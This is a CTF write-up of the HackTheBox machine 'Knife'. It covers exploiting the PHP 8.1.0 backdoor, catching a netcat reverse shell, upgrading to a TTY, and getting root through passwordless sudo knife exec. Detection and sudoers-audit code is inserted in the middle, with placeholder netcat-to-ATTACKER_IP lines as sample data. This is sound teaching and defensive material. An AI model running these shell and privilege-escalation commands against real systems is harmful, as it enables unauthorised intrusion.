HackTheBox — Knife

Prof.bubs
4 min readJul 21, 2021

Knife is a new HTB machine based on Linux, and it carries 20 points. It is a fairly easy machine that I was willing to give a shot. There are a few prerequisites before we start this challenge: a Linux VM and Wappalyzer, which is a Chrome extension (Recon-ng could be used instead, but in this write-up I used Wappalyzer). So let's get started:

Reconnaissance:

I began with a simple Nmap scan.

There was nothing valuable I could infer from this scan except the fact that it had a web server running on port 80.

Webserver

The site was pretty standard. I tried the usual inspection using Inspect Element and came up with nothing, up until I noticed this.


Wappalyzer found that the web server was running PHP version 8.1.0. Now all I had to do was search Exploit-DB for a possible vulnerability in that version of PHP.

Source: https://www.exploit-db.com/exploits/49933

Bingo! I found a perfect exploit. Now all I had to do was download it (or save it to a file) and run the script.

And just like that, we got into their system. Many things won't work for us yet, though, since we don't have certain permissions on their system. So I tried to open their system to my side; in simple words, I brought their system into mine. To do this, we need to pop a reverse shell on their system and connect it back to ours using a tool called netcat. To get a reverse shell I used a script from Pentest Monkey for netcat.

Source: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

The second command seemed to work fine. So first I started listening on port 4444 using the netcat command

nc -nvlp 4444

and then I pasted the command from Pentest Monkey into the system.

And just like that, I got a reverse shell into their system. Now I will upgrade it to a TTY shell to make our lives easier, meaning we can move around the terminal and use specific commands like 'cd' and so on. These are the commands to get a TTY shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

Once that's done, we get a terminal that looks like this:

The first user flag was located in the directory /home/james.
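Looking at the same chain from the defender's side: a web worker forking a shell, the web account running netcat, and a python one-liner calling pty.spawn are each unusual on a production host, and together they are the exact sequence used above. The following is an added example of mine, not code from the write-up, that flags those three steps in a process-start feed. The event format and field names are this example's own convention (not auditd's or any EDR's), the events are constructed, and ATTACKER_IP is a placeholder.

```python
"""Spot the web-shell -> reverse shell -> TTY-upgrade chain in a process-start feed.

The events below are constructed for this example; their field names are this
example's own convention, not those of auditd or any particular EDR product.
"""
import re

WEB_WORKERS = {"apache2", "httpd", "nginx", "php-fpm", "php-fpm8.1"}
SHELLS = {"sh", "bash", "dash", "zsh"}
NETCAT = {"nc", "ncat", "netcat"}
WEB_USERS = {"www-data", "apache", "nginx"}
PTY_SPAWN = re.compile(r"pty\.spawn\(")  # the upgrade one-liner from the write-up


def classify(event):
    """Return a list of (rule, detail) hits for one process-start event."""
    hits = []
    comm, parent, user, cmd = (event["comm"], event["parent_comm"],
                               event["user"], event["cmdline"])
    # A PHP/Apache worker should serve requests, not fork an interactive shell.
    if parent in WEB_WORKERS and comm in SHELLS:
        hits.append(("web_worker_spawned_shell", f"{parent} -> {comm} as {user}"))
    # The web service account has no legitimate reason to run netcat.
    if comm in NETCAT and user in WEB_USERS:
        hits.append(("netcat_as_web_user", cmd))
    # pty.spawn from "python -c" is the classic "upgrade to a TTY" step.
    if PTY_SPAWN.search(cmd):
        hits.append(("tty_upgrade", cmd))
    return hits


def scan(events):
    """Apply classify() to a whole feed; returns (pid, rule, detail) tuples."""
    return [(ev["pid"], rule, detail)
            for ev in events for rule, detail in classify(ev)]


# Constructed feed: one benign worker, the chain from the write-up, one normal login.
# ATTACKER_IP is a placeholder, not a real address.
SAMPLE_EVENTS = [
    {"pid": 1001, "user": "www-data", "comm": "php-fpm8.1", "parent_comm": "php-fpm8.1",
     "cmdline": "php-fpm: pool www"},
    {"pid": 1002, "user": "www-data", "comm": "sh", "parent_comm": "php-fpm8.1",
     "cmdline": "sh -c nc ATTACKER_IP 4444"},
    {"pid": 1003, "user": "www-data", "comm": "nc", "parent_comm": "sh",
     "cmdline": "nc ATTACKER_IP 4444"},
    {"pid": 1004, "user": "www-data", "comm": "python3", "parent_comm": "sh",
     "cmdline": "python3 -c import pty;pty.spawn(\"/bin/bash\")"},
    {"pid": 1005, "user": "james", "comm": "bash", "parent_comm": "sshd",
     "cmdline": "-bash"},
]

if __name__ == "__main__":
    for pid, rule, detail in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
```

The first rule alone (web worker parent, shell child) is the one worth paging on: it fires at the moment the PHP exploit lands, before any reverse shell or TTY upgrade, and it does not depend on which cheat-sheet one-liner was used.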

Now from this command we can see that the knife command can be run as root, and it does not need any password. This is clearly our vulnerability, and we are about to abuse it to escalate our privileges. But first, what is knife?! So let's run that command and see what we get:

We are simply going to use this root-level operation to execute /bin/sh on the system. The /bin/sh command was even there in the config files in the /home/james directory; we are simply using that command to escalate our privileges. This is the command to do so:

sudo knife exec --exec "exec '/bin/sh -i'"
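The root cause here is a sudo rule that lets a user run knife as root without a password, while knife's exec subcommand evaluates arbitrary Ruby, so the rule is a passwordless root shell in disguise. As an added example of mine (not from the write-up), here is a small audit that parses sudoers-style rules and flags exactly that pattern. The rule text is constructed for the example, not the machine's real sudoers, and the list of code-executing binaries is deliberately limited to knife, the one the write-up demonstrates.

```python
"""Audit sudoers-style rules for passwordless root access to code-executing tools.

The rule text in SAMPLE_SUDOERS is constructed for this example. The parser handles
the common "user host=(runas) TAG: cmd, cmd" form and skips Defaults, aliases
and comments; it is not a complete sudoers grammar.
"""
import os
import re

# Tools whose sudo use as root amounts to a root shell. knife's exec subcommand
# evaluates arbitrary Ruby, which is the primitive the write-up uses.
CODE_EXEC_BINARIES = {"knife"}
TAGS = {"NOPASSWD", "PASSWD", "SETENV", "NOSETENV", "EXEC", "NOEXEC",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT",
        "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW"}
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
SKIP_RE = re.compile(r"^(Defaults|\w+_Alias)\b")


def parse_rules(text):
    """Return one dict per command spec: user, runas, nopasswd, command."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or SKIP_RE.match(line):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # "(ALL:ALL)" carries a group part; only the user part matters here.
        # A missing runas clause means root.
        runas = (m.group("runas") or "root").split(":", 1)[0].strip() or "root"
        nopasswd = False  # tags are sticky across the comma-separated list
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            while True:  # peel off any leading "TAG:" prefixes
                tag, sep, rest = spec.partition(":")
                tag = tag.strip().upper()
                if not sep or tag not in TAGS:
                    break
                if tag == "NOPASSWD":
                    nopasswd = True
                elif tag == "PASSWD":
                    nopasswd = False
                spec = rest.strip()
            entries.append({"user": m.group("user"), "runas": runas,
                            "nopasswd": nopasswd, "command": spec})
    return entries


def assess(entry):
    """Return (severity, reason) for a risky entry, or None if it is acceptable."""
    if entry["user"] == "root" or not entry["nopasswd"]:
        return None
    if entry["runas"] not in ("root", "ALL"):
        return None
    command = entry["command"]
    if command == "ALL":
        return ("high", "passwordless sudo to any command as root")
    base = os.path.basename(command.split()[0])
    if base in CODE_EXEC_BINARIES:
        return ("high", f"{base} evaluates arbitrary code, so this is a passwordless root shell")
    return ("medium", "passwordless command as root; confirm it cannot launch other programs")


def audit(text):
    """Return (user, command, severity) for every rule that assess() flags."""
    findings = []
    for entry in parse_rules(text):
        verdict = assess(entry)
        if verdict:
            findings.append((entry["user"], entry["command"], verdict[0]))
    return findings


SAMPLE_SUDOERS = """\
# constructed sample for this example, not the machine's real sudoers
Defaults env_reset
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
james ALL=(ALL) NOPASSWD: /usr/bin/knife
backup ALL=(root) NOPASSWD: /usr/local/bin/backup.sh, /usr/local/bin/rotate.sh, PASSWD: /usr/bin/apt-get update
"""

if __name__ == "__main__":
    for user, command, severity in audit(SAMPLE_SUDOERS):
        print(f"[{severity}] {user}: {command}")
```

The fix is the rule itself, not the binary: drop NOPASSWD for knife, and do not grant it as root at all, since any knife subcommand that can load Ruby gives the same result. Running this against the output of `sudo -l` on a host after a build is a cheap way to catch the mistake before a player (or an attacker) does.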

BINGO! The flag is located in the root folder. Thank you for reading my write-up! :) Please like if you felt my write-up was useful to you in any way. Thank you once again!
